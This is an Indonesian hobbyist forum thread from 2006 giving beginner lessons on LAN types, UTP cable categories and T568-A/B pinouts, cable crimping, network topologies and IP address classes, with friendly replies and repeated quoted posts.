Secara komunikasinya, terdapat dua tipe jaringan atau LAN, yaitu jaringan Peer to Peer dan
jaringan Client-Server.
Pada jaringan peer to peer, setiap komputer yang terhubung ke jaringan dapat bertindak baik
sebagai workstation maupun server. Sedangkan pada jaringan Client-Server, hanya satu komputer
yang bertugas sebagai server dan komputer lain berperan sebagai workstation. Antara dua tipe
jaringan
tersebut masing-masing memiliki keunggulan dan kelemahan, ntar kita bakal bahas lebuh jauh
PC
walah, gak banget deh bahas masalah PC yang kita pake sekarang ini, tapi kita akan bahas PC yang
berfungsi di jaringan aja.
Tipe personal komputer yang digunakan di dalam jaringan akan sangat menentukan unjuk kerja dari
jaringan tersebut. Komputer dengan unjuk kerja tinggi akan mampu mengirim dan mengakses data
dalam jaringan dengan cepat.
Di dalam jaringan tipe Client-Server, komputer yang difungsikan sebagai server mutlak harus
memiliki unjuk kerja yang lebih tinggi dibandingkan komputer-komputer
lain sebagai workstation-nya, karena server akan bertugas menyediakan fasilitas dan
mengelola operasional jaringan tersebut
NIC
Berdasarkan tipe bus, ada beberapa tipe network interface card (nic) atau network card, yaitu ISA
dan PCI.
Saat ini terdapat jenis network card yang banyak digunakan, yaitu PCI
untuk lebih jelasnya, lihat aja LAN Card sodara-sodara..asal gak on board kayak punya alis, hhe..
NAD
bukan naggroe kita nih, tapi Network Adapter Card. Setiap network card akan memiliki driver atau
program yang berfungsi untuk mengaktifkan dan mengkonfigurasi network adapter tersebut
disesuaikan dengan lingkungan dimana network card tersebut dipasang agar dapat digunakan untuk
melakukan komunikasi data.
sistem operasi
OS disini bukan seperti Windows dan Linux, tapi OS peer to peer dan Client Server. kita bahas
satu2...
1. Jaringan Client-Server
-------------------------
Server adalah komputer yang menyediakan fasilitas bagi komputer-komputer lain didalam jaringan
dan client adalah komputer-komputer yang menerima atau menggunakan fasilitas yang disediakan
oleh server. Server dijaringan tipe client-server disebut dengan Dedicated Server karena murni
berperan sebagai server yang menyediakan fasilitas kepada workstation dan server tersebut tidak
dapat berperan sebagai workstation.
Kelemahan
1. Biaya operasional relatif lebih mahal.
2. Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
3. Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan maka
secara keseluruhan jaringan akan terganggu.
Keunggulan
1. Antar komputer dalam jaringan dapat saling berbagi-pakai fasilitas yang dimilikinya
seperti:harddisk, drive, fax/modem, printer.
2. Biaya operasional relatif lebih murah dibandingkan dengan tipe jaringan client-server, salah
satunya karena tidak memerlukan adanya server yang memiliki kemampuan khusus untuk
mengorganisasikan dan menyediakan fasilitas jaringan.
3. Kelangsungan kerja jaringan tidak tergantung pada satu server. Sehingga bila salah satu
komputer/peer mati atau rusak, jaringan secara keseluruhan tidak akan mengalami gangguan.
Kelemahan
1. Troubleshooting jaringan relatif lebih sulit, karena pada jaringan tipe peer to peer setiap
komputer dimungkinkan untuk terlibat dalam komunikasi yang ada. Di jaringan client-server,
komunikasi adalah antara server dengan workstation.
2. Unjuk kerja lebih rendah dibandingkan dengan jaringan client-server, karena setiap
komputer/peer disamping harus mengelola pemakaian fasilitas jaringan juga harus mengelola
pekerjaan atau aplikasi sendiri.
3. Sistem keamanan jaringan ditentukan oleh masing-masing user dengan mengatur keamanan
masing-masing fasilitas yang dimiliki.
4. Karena data jaringan tersebar di masing-masing komputer dalam jaringan, maka backup harus
dilakukan oleh masing-masing komputer tersebut.
(capek euy, mending copy aja ya?)
nah, itu sekilas tentang LAN, karena udah kebanyakan, biar gak bosen, kita udahin dulu, ntar kita
bahas tentang protokol2nya dan hardware lain yang mendukung LAN itu serta request dari teman2..
("_")
Email :Muammarsubki@yahoo.com
Website : http://www.subki.orgfree.com
c4m4r2006
View Public Profile
Send a private message to c4m4r2006
Find More Posts by c4m4r2006
--------------------------------------------------------------------------------
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
--------------------------------------------------------------------------------
Quote:
Originally Posted by AlisBandung
---------------------
jadi gini, kabel UTP (ada 8 kabel warna-warni) itu kan punya standard, agar di setiap negara yang
memakainya pnya keseragaman dalam implementasinya, nah sampai saat alis mengenal UTP, ada 2
standar yag dipakai, yaitu:
1. Standard T568-A
Pin warna
--------------------
1 putih dan hijo
2 hijo
3 putih orange
4 Biru
5 putih dan biru
6 Orange
7 putih dan coklat
8 coklat
2. Standard T568-B
Pin warna
--------------------
1 putih dan orange
2 Orange
3 putih dan hijo
4 Biru
5 putih dan biru
6 hijo
7 putih dan coklat
8 coklat
2 standard itu ntar terpakai pada saat kabel digunakan untuk straight, rollover atau crossover, gini
penjelasannya:
Straight-Through
=================
Jenis kabel ini digunakan untuk menghubungkan antara workstation dengan hub/switch. Kabel ini
juga memiliki 4 pairs (8 wire) dimana setiap pin antara ujung satu dengan ujung lainnya harus
sama. Maksudnya, bila salah satu ujung memakai standard T568-A maka ujung satunya harus
memakai T568-A juga. Begitu pula sebaliknya, jika salah satu ujung menggunakan standard T568-
B, ujung satunya juga harus memakai standard yang sama.
Rollover
========
Digunakan untuk koneksi antara sebuah workstation ke port console pada sebuah router atau switch.
Standard yang digunakan adalah T568-A pada salah satu ujung dan
ujung lainnya urutan T568-A tinggal di roll (dibalik). Demikian juga jika yang dipakai
sekalian belajar nih tentang jaringan, dan biar topik ini gak sepi, mending alis nulis aja deh tentang
jaringan, kalo mau tanya, posting aja, kalo bisa dijawab syukur kalo gak bisa pasti ada teman lain
yang ngejawab
sebenarnya gak tau mulai dari mana nih ngomongnya, tapi karena thread ini dimulail dengan kabel,
kita bahs dikit tentang kabel ya..maap kalo membosankan bagi yang udah tau, kan lumayan, bagi-
bagi ilmu bagi yang belum tau
kabel
=====
bicara tentang jaringan, pasti gak lepas dari yang namanya kabel, walaupun sekarang udah
jamannya wireless, tapi kabel tetap akan menjadi bahan pelajaran yang gak mungkin dilupakan oleh
network equipment, toh wireless sekarang juga masih menganut ajaran (emang silat?) wired,
misalnya optik dll lah
prinsip kerjanya sih ringan, kabel ngubungin satu sisi dengan sisi yang lain dengan terminator di
masing2 ujung, tapi hubungan ini tidak menyebabkan hubungan tertutup antar 2 sisi saja, bisa di
setting menjadi 2 hubungan terbuka dengan sisi yang lain
sekarang kan jaman udah canggih, jadi topologi kabel juga berkembang, mulai dari jamannya
teknologi telegraf yang make gelombang radio hingga jamannya serat optik dan laser.
kabel:Type CAT 1
tipe :UTP
fitur:analog(biasanya digunakan di perangkat telephone pada umumnya dan pada jalur ISDN –
integrated service digital networks-. Juga untuk menghubungkan modem dengan line telepon).
kabel:Type CAT 2
tipe :UTP
fitur:up to 1 Mbits(sering digunakan pada topologi token ring)
kabel:Type CAT 3
tipe :UTP / STP
fitur:16 Mbits data transfer(sering digunakan pada topologi token ring atau
10BaseT)
kabel:Type CAT 4
tipe :UTP, STP
fitur:20 Mbits data transfer(biasanya digunakan pada topologi token ring)
kabel:Type CAT 5
tipe :UTP, STP
fitur:up to 100 MH. 100 Mbits data transfer / 22 db
kabel:Type CAT 6
tipe :UTP, STP
fitur:up to 155 MHz or 250 MHz. 2,5 Gigabit Ethernet up to 100 meters or 10
Gbit/s up to 25 meters . 20,2 db (Gigabit Ethernet)
kabel:Type CAT 7
tipe :UTP, STP
fitur:up to 200 MHz or 700 Mhz Giga-Ethernet / 20.8 db(Gigabit Ethernet)
ini tipe kabel, bukan untuk dihafal lho...alis juga ngambilnya dari:
http://www.glossary-tech.com/cable.htm dan http://www.firewall.cx/cabling_utp.php
Pemberian kategori 1/2/3/4/5/6 merupakan kategori spesifikasi untuk masing-masing kabel tembaga
dan juga untuk jack. Masing-masing merupakan seri revisi atas kualitas kabel, kualitas
pembungkusan kabel (isolator) dan juga untuk kualitas “belitan” (twist) masing-masing pasang
kabel. Selain itu juga untuk menentukan besaran frekuensi yang bisa lewat pada sarana kabel
tersebut, dan juga kualitas isolator sehingga bisa mengurangi efek induksi antar kabel (noise bisa
ditekan sedemikian rupa).------> fisika banget tuh
Perlu diingat juga (ingak..ingak), spesifikasi antara CAT5 dan CAT5 enchanced mempunyai standar
industri yang sama, namun pada CAT5e sudah dilengkapi dengan insulator untuk mengurangi efek
induksi atau electromagnetic interference. Kabel CAT5e bisa digunakan untuk menghubungkan
network hingga
kecepatan 1Gbps.(buset..1 giga bokkkkkk)
Kabel Coaxial ini (RG-6) jika digunakan dalam jaringan mempunyai spesifikasi dan aturan sebagai
berikut:
* Setiap ujung harus diterminasi dengan terminator 50-ohm (dianjurkan menggunakan terminator
yang sudah dirakit, bukan menggunakan satu buah resistor 50-ohm 1 watt, sebab resistor
mempunyai disipasi tegangan yang lumayan lebar, kalo gak ahli, bisa gawat nih).
* Maksimum 3 segment dengan peralatan terhubung (attached devices) atau berupa populated
segments.
* Setiap kartu jaringan mempunyai pemancar tambahan (external transceiver).
* Setiap segment maksimum berisi 100 perangkat jaringan, termasuk dalam hal ini repeaters.
* Maksimum panjang kabel per segment adalah 1.640 feet (atau sekitar 500 meter).
* Maksimum jarak antar segment adalah 4.920 feet (atau sekitar 1500 meter).
* Setiap segment harus diberi ground.
* Jarang maksimum antara tap atau pencabang dari kabel utama ke perangkat (device) adalah 16
feet(sekitar 5 meter).
* Jaral minimum antar tap adalah 8 feet (sekitar 2,5 meter).
ini tipe kabel, bukan untuk dihafal lho...alis juga ngambilnya dari:
http://www.glossary-tech.com/cable.htm dan http://www.firewall.cx/cabling_utp.php
dengan modal les bahasa inggris, hhe..
ntar kita akan ngebahas topologi jaringan yang merupakan "program kerja" dari kabel itu sendiri
semoga bermanfaat
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
12-12-2006, 01:31 PM #3
jurnalis jh
Imum Mukim
--------------------------------------------------------------------------------
topologi jaringan
=================
penentuan topologi jaringan akan menentukan jenis kabel yang akan kita pake, dan juga sebaliknya,
ketersediaan kabel dan gocek yangkita punya, menjadi pikiran dong untuk membangun sebuah
jaringan (untuk kedepannya kita sebut network, biar keren)
sebenarnya sih banyak banget topologi network itu, tapi yang sering kita dengar itu cuma 3 doang,
dan yang banyak itu juga berbasis yang 3 ini, cuma kadang2 pelaku network memodifikasi sedikit
tergantung kondisi, misalkan areanya, panjang kabelnya, dll
1. ring topology
Topologi ini manfaatin kurva tertutup, artinya informasi dan data serta traffic disalurkan sedemikian
rupa sehingga ke masing-masing node. Umumnya fasilitas ini memanfaatkan fiber optic sebagai
sarananya
(walaupun ada juga yang menggunakan twisted pair).
(bahasannya ada di atas)
3. star topology
Topologi jaringan ini banyak digunakan di berbagai tempat, karena kemudahan untuk menambah,
mengurangi atau mendeteksi kerusakan jaringan yang ada. Selain itu, permasalahan panjang kabel
yang harus sesuai (matching) juga tidak menjadi suatu yang penting lagi. Pokoknya asal ada hub
(yang masih beres tentunya) maka bisa terhubunglah beberapa komputer dan sumber daya jaringan
secara mudah.
Dengan berbekal crimtool, kabel UTP (biasanya CAT5) dan connector, seseorang dengan mudah
membuat sebuah sistem jaringan. Tentu ada beberapa kerugian karena panjang kabel (loss effect)
maupun karena hukum konduksi, namun hampir bisa dikatakan semua itu bisa diabaikan.
Paparan ketiga topologi di atas hanya sebagai sebuah pengantar. Intinya bahwa sebuah jaringan bisa
jadi
merupakan kombinasi dari dua atau tiga topologi di atas. Misalnya saja ada yang menyebut tree
topology,
dimana sebenarnya topologi ini merupakan gabungan atau kombinasi dari ketiga topologi yang ada.
itu sekilas tentang topologi jaringan, sebenarnya lebih enak kalo ada gambarnya, tapi alis masih
bingung, gimana ya cara upload gambar di postingan?
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
12-12-2006, 01:41 PM #4
ihan_sunrise
Contributor
Join Date: Apr 2006
Location: Negeri Syariat
Posts: 2,210
Thanks: 0
Thanked 25 Times in 10 Posts
--------------------------------------------------------------------------------
up load gambar harus dari photobucket dulu lis.....setelah itu baru masukin kemari...kayaknya dulu
dah ad penjelasannya, cuman ihan lupa di thread apa
__________________
cinta telah merengkuh ku
dan aku lega bisa memeluknya
rindu telah menarik ku
dan aku senang karena ia tak membiar kan ku
Ihan Sunrise
http://ihansunrise.blogspot.com/
ihan_sunrise
View Public Profile
Send a private message to ihan_sunrise
Visit ihan_sunrise's homepage!
Find More Posts by ihan_sunrise
--------------------------------------------------------------------------------
makasih ya alis... ilmu yang alis share semoga bermanfaat bagi kita semua amien.
Alis... gi ngapain ?
__________________
Satu hati... Satu rasa... SEMESTINYA !!!
My Blogs: http://www.baiquni.net/
My Wordpress: http://baiquni.wordpress.com/
My Friendster: http://www.friendster.com/mbaiquni
My Bussiness: http://www.ipulsa.net/
baiquni
View Public Profile
Send a private message to baiquni
Visit baiquni's homepage!
Find More Posts by baiquni
12-15-2006, 12:58 PM #6
jurnalis jh
Imum Mukim
--------------------------------------------------------------------------------
Quote:
Originally Posted by baiquni
makasih ya alis... ilmu yang alis share semoga bermanfaat bagi kita semua amien.
Alis... gi ngapain ?
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
12-15-2006, 01:32 PM #7
sHinOsuke
Super Moderator
sHinOsuke
View Public Profile
Send a private message to sHinOsuke
Find More Posts by sHinOsuke
12-15-2006, 03:33 PM #8
aloysurf
TUKANG FOTO
--------------------------------------------------------------------------------
Quote:
Originally Posted by AlisBandung
itu sekilas tentang topologi jaringan, sebenarnya lebih enak kalo ada gambarnya, tapi alis masih
bingung, gimana ya cara upload gambar di postingan?
Salam
aloysurf
View Public Profile
Send a private message to aloysurf
Visit aloysurf's homepage!
Find More Posts by aloysurf
12-17-2006, 11:22 AM #9
muiz
Peutua
--------------------------------------------------------------------------------
Quote:
Originally Posted by AlisBandung
amin...alis kira gak ada yang respon, hhe..
ntar kita mulai lagi dengan LAN...tapi sekarang lagi searching bahan2 TA dulu, besok ya di
sambung lagi
ow..mantap bang lagi sibuk TA malah sempat bagi2 ilmu mantap..oya untuk cara pasang kabel utp
nya ditambah dikit donk bang,,,biar mantap...sekalian cara buat pc router...dalam bahasa indonesia
ya bang...sep...mantap buat bang alis..
muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz
--------------------------------------------------------------------------------
acheh
View Public Profile
Send a private message to acheh
Find More Posts by acheh
--------------------------------------------------------------------------------
@acheh
ternyata repot ya buat nambahin gambar ke sini, jadi males juga euy..hhe
@muiz
pc router dan masang UTP ya...
besok kita sambung ya...
@Shinosuke
sip deh, tapi sebelum WLAN, kita bahas LANnya aja dulu ya..
sambung nyak....
kemarin kita udah ngebahas kabel ama topologinya, sekarang kita bakal bahas salah satu
implementasinya, yaitu LAN
seiring berkembangnya jaman ni, kita gak hanya mengenal LAN doang, tapi sekarang udah ada
WLAN, yaitu Wireless LAN, yaitu LAN tanpa kabel (simplenya gitu).
Local Area Network (LAN) adalah sejumlah komputer yang saling dihubungkan bersama di dalam
satu areal tertentu yang tidak begitu luas, seperti di dalam satu kantor atau gedung.
Secara komunikasinya, terdapat dua tipe jaringan atau LAN, yaitu jaringan Peer to Peer dan
jaringan Client-Server.
Pada jaringan peer to peer, setiap komputer yang terhubung ke jaringan dapat bertindak baik
sebagai workstation maupun server. Sedangkan pada jaringan Client-Server, hanya satu komputer
yang bertugas sebagai server dan komputer lain berperan sebagai workstation. Antara dua tipe
jaringan
tersebut masing-masing memiliki keunggulan dan kelemahan, ntar kita bakal bahas lebuh jauh
PC
walah, gak banget deh bahas masalah PC yang kita pake sekarang ini, tapi kita akan bahas PC yang
berfungsi di jaringan aja.
Tipe personal komputer yang digunakan di dalam jaringan akan sangat menentukan unjuk kerja dari
jaringan tersebut. Komputer dengan unjuk kerja tinggi akan mampu mengirim dan mengakses data
dalam jaringan dengan cepat.
Di dalam jaringan tipe Client-Server, komputer yang difungsikan sebagai server mutlak harus
memiliki unjuk kerja yang lebih tinggi dibandingkan komputer-komputer
lain sebagai workstation-nya, karena server akan bertugas menyediakan fasilitas dan
mengelola operasional jaringan tersebut
NIC
Berdasarkan tipe bus, ada beberapa tipe network interface card (nic) atau network card, yaitu ISA
dan PCI.
Saat ini terdapat jenis network card yang banyak digunakan, yaitu PCI
untuk lebih jelasnya, lihat aja LAN Card sodara-sodara..asal gak on board kayak punya alis, hhe..
NAD
bukan naggroe kita nih, tapi Network Adapter Card. Setiap network card akan memiliki driver atau
program yang berfungsi untuk mengaktifkan dan mengkonfigurasi network adapter tersebut
disesuaikan dengan lingkungan dimana network card tersebut dipasang agar dapat digunakan untuk
melakukan komunikasi data.
sistem operasi
OS disini bukan seperti Windows dan Linux, tapi OS peer to peer dan Client Server. kita bahas
satu2...
1. Jaringan Client-Server
-------------------------
Server adalah komputer yang menyediakan fasilitas bagi komputer-komputer lain didalam jaringan
dan client adalah komputer-komputer yang menerima atau menggunakan fasilitas yang disediakan
oleh server. Server dijaringan tipe client-server disebut dengan Dedicated Server karena murni
berperan sebagai server yang menyediakan fasilitas kepada workstation dan server tersebut tidak
dapat berperan sebagai workstation.
Keunggulan
1. Kecepatan akses lebih tinggi karena penyediaan fasilitas jaringan dan pengelolaannya dilakukan
secara khusus oleh satu komputer (server) yang tidak dibebani dengan tugas lain sebagai
workstation.
2. Sistem keamanan dan administrasi jaringan lebih baik, karena terdapat seorang pemakai yang
bertugas sebagai administrator jaringan, yang mengelola administrasi dan sistem keamanan
jaringan.
3. Sistem backup data lebih baik, karena pada jaringan client-server backup dilakukan terpusat di
server, yang akan membackup seluruh data yang digunakan di dalam jaringan.
Kelemahan
1. Biaya operasional relatif lebih mahal.
2. Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
3. Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan maka
secara keseluruhan jaringan akan terganggu.
2. Jaringan Peer To Peer
--------------------------
Bila ditinjau dari peran server di kedua tipe jaringan tersebut, maka server di jaringan tipe peer to
peer diistilahkan non-dedicated server, karena server tidak berperan sebagai server murni melainkan
sekaligus dapat berperan sebagai workstation. (lha?)
Keunggulan
1. Antar komputer dalam jaringan dapat saling berbagi-pakai fasilitas yang dimilikinya
seperti:harddisk, drive, fax/modem, printer.
2. Biaya operasional relatif lebih murah dibandingkan dengan tipe jaringan client-server, salah
satunya karena tidak memerlukan adanya server yang memiliki kemampuan khusus untuk
mengorganisasikan dan menyediakan fasilitas jaringan.
3. Kelangsungan kerja jaringan tidak tergantung pada satu server. Sehingga bila salah satu
komputer/peer mati atau rusak, jaringan secara keseluruhan tidak akan mengalami gangguan.
Kelemahan
1. Troubleshooting jaringan relatif lebih sulit, karena pada jaringan tipe peer to peer setiap
komputer dimungkinkan untuk terlibat dalam komunikasi yang ada. Di jaringan client-server,
komunikasi adalah antara server dengan workstation.
2. Unjuk kerja lebih rendah dibandingkan dengan jaringan client-server, karena setiap
komputer/peer disamping harus mengelola pemakaian fasilitas jaringan juga harus mengelola
pekerjaan atau aplikasi sendiri.
3. Sistem keamanan jaringan ditentukan oleh masing-masing user dengan mengatur keamanan
masing-masing fasilitas yang dimiliki.
4. Karena data jaringan tersebar di masing-masing komputer dalam jaringan, maka backup harus
dilakukan oleh masing-masing komputer tersebut.
nah, itu sekilas tentang LAN, karena udah kebanyakan, biar gak bosen, kita udahin dulu, ntar kita
bahas tentang protokol2nya dan hardware lain yang mendukung LAN itu serta request dari teman2..
("_")
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
--------------------------------------------------------------------------------
Quote:
Originally Posted by acheh
ini thread makin sip klo disertai dengan gambarnya ..
misal kabel coaxial, nah gambar coaxialnya gmn .. gtu ...
muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz
--------------------------------------------------------------------------------
muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz
--------------------------------------------------------------------------------
---------------------
jadi gini, kabel UTP (ada 8 kabel warna-warni) itu kan punya standard, agar di setiap negara yang
memakainya pnya keseragaman dalam implementasinya, nah sampai saat alis mengenal UTP, ada 2
standar yag dipakai, yaitu:
1. Standard T568-A
Pin warna
--------------------
1 putih dan hijo
2 hijo
3 putih orange
4 Biru
5 putih dan biru
6 Orange
7 putih dan coklat
8 coklat
2. Standard T568-B
Pin warna
--------------------
1 putih dan orange
2 Orange
3 putih dan hijo
4 Biru
5 putih dan biru
6 hijo
7 putih dan coklat
8 coklat
2 standard itu ntar terpakai pada saat kabel digunakan untuk straight, rollover atau crossover, gini
penjelasannya:
Straight-Through
=================
Jenis kabel ini digunakan untuk menghubungkan antara workstation dengan hub/switch. Kabel ini
juga memiliki 4 pairs (8 wire) dimana setiap pin antara ujung satu dengan ujung lainnya harus
sama. Maksudnya, bila salah satu ujung memakai standard T568-A maka ujung satunya harus
memakai T568-A juga. Begitu pula sebaliknya, jika salah satu ujung menggunakan standard T568-
B, ujung satunya juga harus memakai standard yang sama.
Rollover
========
Digunakan untuk koneksi antara sebuah workstation ke port console pada sebuah router atau switch.
Standard yang digunakan adalah T568-A pada salah satu ujung dan
ujung lainnya urutan T568-A tinggal di roll (dibalik). Demikian juga jika yang dipakai adalah
standard T568-B.
Crossover
===========
Merupakan jenis kabel yang digunakan untuk menghubungkan antar workstation atau antar
hub/switch. Kabel jenis ini menggunakan standard T568-A pada salah satu ujung, dan T568-B pada
ujung lainnya.
1. Pembuatan kabel
a) Siapkan kabel UTP dan RJ 45 sebagai interfacenya
b) Potong jaket ujung kabel kira-kira 1.5 cm dengan cutter atau gunting,dan buanglah jaket tersebut.
Hati-hati dalam mengupas jaket, jangan sampai kabel yang ada di dalamnya ikut terpotong.
c) Untwist atau buka lilitan masing-masing pasangan kabel
d) Untuk membuat kabel straight-trough, crossover maupun rollover, lihat standard T568-A atau
T568-B
e) Sesuaikan masing-masing jenis kabel dengan standardnya, lalu luruskan hingga memungkinkan
untuk bisa dimasukkan ke dalam RJ 45
f) Bila sudah dimasukkan ke RJ 45, crimpinglah dengan menggunakan peralatan yang ada agar
kabel menjadi permanen dan tidak mudah goyah
g) Periksa terlebih dahulu urutan kabelnya sebelum dicrimping, karena kabel yang sudah
dicrimping tidak dapat dicabut lagi. Artinya jika kita salah mengurutkan pasangan atau
memasukkan ke RJ 45 nya kurang sempurna, besar kemungkinan kabel tidak dapat dipakai
2. Test kabel
a) Kabel yang sudah dicrimping dapat dideteksi kesalahannya dengan memakai cable tester (misal :
Fluke 620 LSN CableMeter)
b) Bila cable tester tidak ada, pasangkan kabel tersebut dari NIC ke hub (bila jenisnya straight-
through) dan antar workstation jika jenis kabelnya adalah crossover.
c) Pekailah perintah ping untuk uji coba kabel. Apabila koneksi dapat terbentuk, berarti pembuatan
kabel Anda sudah benar. Sebaliknya, jika koneksi tak dapat terbentuk, berarti ada kesalahan dalam
proses cabling.
semoga bermanfaat
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
--------------------------------------------------------------------------------
Protokol TCP/IP
===============
Karena penting peranannya pada sistem operasi Windows dan juga karena protokol TCP/IP
merupakan protokol pilihan (default) dari Windows. Protokol TCP berada pada lapisan Transport
model OSI (Open System Interconnection), sedangkan IP berada pada lapisan Network mode OSI
IP Address
----------
IP address adalah alamat yang diberikan pada jaringan komputer dan peralatan jaringan yang
menggunakan protokol TCP/IP. IP address terdiri atas 32 bit angka biner yang dapat dituliskan
sebagai empat kelompok angka desimal yang dipisahkan oleh tanda titik seperti 192.168.0.1.
+-------------------+-----------+
| Network ID | Host ID |
+-----+------+------+-----------+
| 192 | 168 | 0 | 1 |
+-----+------+------+-----------+
IP address terdiri atas dua bagian yaitu network ID dan host ID, dimana network ID menentukan
alamat jaringan komputer, sedangkan host ID menentukan alamat host (komputer, router, switch).
Oleh sebab itu IP address memberikan alamat lengkap suatu host beserta alamat jaringan di mana
host itu berada.
Kelas-kelas IP Address
------------------------
Untuk mempermudah pemakaian, bergantung pada kebutuhan pemakai, IP address dibagi dalam
tiga kelas seperti diperlihatkan dibawah
------+------------+---------------+--------------------+
Kelas |Network ID Host ID | Default Subnet Mask|
------+-------------+---------------+--------------------+
A |xxx.0.0.1 |xxx.255.255.254| 255.0.0.0 |
B |xxx.xxx.0.1 |xxx.xxx.255.254| 255.255.0.0 |
C |xxx.xxx.xxx.1|xxx.xxx.xxx.254| 255.255.255.0 |
------+-------------+---------------+--------------------+
IP address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar.
Range IP 1.xxx.xxx.xxx. – 126.xxx.xxx.xxx, terdapat 16.777.214 (16 juta) IP address pada tiap
kelas A.
IP address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar. Pada IP address
kelas A, network ID ialah 8 bit pertama, sedangkan host ID ialah 24 bit berikutnya.
Dengan demikian, cara membaca IP address kelas A, misalnya 113.46.5.6 ialah:
Network ID = 113
Host ID = 46.5.6
Sehingga IP address diatas berarti host nomor 46.5.6 pada network nomor 113.
IP address kelas B biasanya dialokasikan untuk jaringan berukuran sedang dan besar. Pada IP
address kelas B, network ID ialah 16 bit pertama, sedangkan host ID ialah 16 bit berikutnya.
Dengan demikian, cara membaca IP address kelas B, misalnya 132.92.121.1
Network ID = 132.92
Host ID = 121.1
Sehingga IP address di atas berarti host nomor 121.1 pada network nomor 132.92. dengan panjang
host ID 16 bit, network dengan IP address kelas B dapat menampung sekitar 65000 host. Range IP
128.0.xxx.xxx – 191.155.xxx.xxx
IP address kelas C awalnya digunakan untuk jaringan berukuran kecil (LAN). Host ID ialah 8 bit
terakhir. Dengan konfigurasi ini, bisa dibentuk sekitar 2 juta network dengan masing-masing
network memiliki 256 IP address. Range IP 192.0.0.xxx – 223.255.255.x.
Pengalokasian IP address pada dasarnya ialah proses memilih network Id dan host ID yang tepat
untuk suatu jaringan. Tepat atau tidaknya konfigurasi ini tergantung dari tujuan yang hendak
dicapai, yaitu mengalokasikan IP address seefisien mungkin.
1. Root-level domain: merupakan tingkat teratas yang ditampilkan sebagai tanda titik (.).
2. Top level domain: kode kategori organisasi atau negara misalnya: .com untuk dipakai oleh
perusahaan; .edu untuk dipakai oleh perguruan tinggi; .gov untuk dipakai oleh badan pemerintahan.
Selain itu untuk membedakan pemakaian nama oleh suatu negara dengan
negara lain digunakan tanda misalnya .id untuk Indonesia atau .au untuk australia.
3. Second level domain: merupakan nama untuk organisasi atau perusahaan, misalnya:
microsoft.com; yahoo.com, dan lain-lain.
Topologi Jaringan adalah gambaran secara fisik dari pola hubungan antara komponen-komponen
jaringan, yang meliputi server, workstation, hub dan pengkabelannnya. Terdapat tiga macam
topologi jaringan umum digunakan, yaitu Bus, Star dan Ring.
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
--------------------------------------------------------------------------------
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
--------------------------------------------------------------------------------
Quote:
Originally Posted by AlisBandung
@acheh
ternyata repot ya buat nambahin gambar ke sini, jadi males juga euy..hhe
@muiz
pc router dan masang UTP ya...
besok kita sambung ya...
@Shinosuke
sip deh, tapi sebelum WLAN, kita bahas LANnya aja dulu ya..
sambung nyak....
kemarin kita udah ngebahas kabel ama topologinya, sekarang kita bakal bahas salah satu
implementasinya, yaitu LAN
seiring berkembangnya jaman ni, kita gak hanya mengenal LAN doang, tapi sekarang udah ada
WLAN, yaitu Wireless LAN, yaitu LAN tanpa kabel (simplenya gitu).
Local Area Network (LAN) adalah sejumlah komputer yang saling dihubungkan bersama di dalam
satu areal tertentu yang tidak begitu luas, seperti di dalam satu kantor atau gedung.
Secara komunikasinya, terdapat dua tipe jaringan atau LAN, yaitu jaringan Peer to Peer dan
jaringan Client-Server.
Pada jaringan peer to peer, setiap komputer yang terhubung ke jaringan dapat bertindak baik
sebagai workstation maupun server. Sedangkan pada jaringan Client-Server, hanya satu komputer
yang bertugas sebagai server dan komputer lain berperan sebagai workstation. Antara dua tipe
jaringan
tersebut masing-masing memiliki keunggulan dan kelemahan, ntar kita bakal bahas lebuh jauh
PC
walah, gak banget deh bahas masalah PC yang kita pake sekarang ini, tapi kita akan bahas PC yang
berfungsi di jaringan aja.
Tipe personal komputer yang digunakan di dalam jaringan akan sangat menentukan unjuk kerja dari
jaringan tersebut. Komputer dengan unjuk kerja tinggi akan mampu mengirim dan mengakses data
dalam jaringan dengan cepat.
Di dalam jaringan tipe Client-Server, komputer yang difungsikan sebagai server mutlak harus
memiliki unjuk kerja yang lebih tinggi dibandingkan komputer-komputer
lain sebagai workstation-nya, karena server akan bertugas menyediakan fasilitas dan
mengelola operasional jaringan tersebut
NIC
Berdasarkan tipe bus, ada beberapa tipe network interface card (nic) atau network card, yaitu ISA
dan PCI.
Saat ini terdapat jenis network card yang banyak digunakan, yaitu PCI
untuk lebih jelasnya, lihat aja LAN Card sodara-sodara..asal gak on board kayak punya alis, hhe..
NAD
bukan naggroe kita nih, tapi Network Adapter Card. Setiap network card akan memiliki driver atau
program yang berfungsi untuk mengaktifkan dan mengkonfigurasi network adapter tersebut
disesuaikan dengan lingkungan dimana network card tersebut dipasang agar dapat digunakan untuk
melakukan komunikasi data.
sistem operasi
OS disini bukan seperti Windows dan Linux, tapi OS peer to peer dan Client Server. kita bahas
satu2...
1. Jaringan Client-Server
-------------------------
Server adalah komputer yang menyediakan fasilitas bagi komputer-komputer lain didalam jaringan
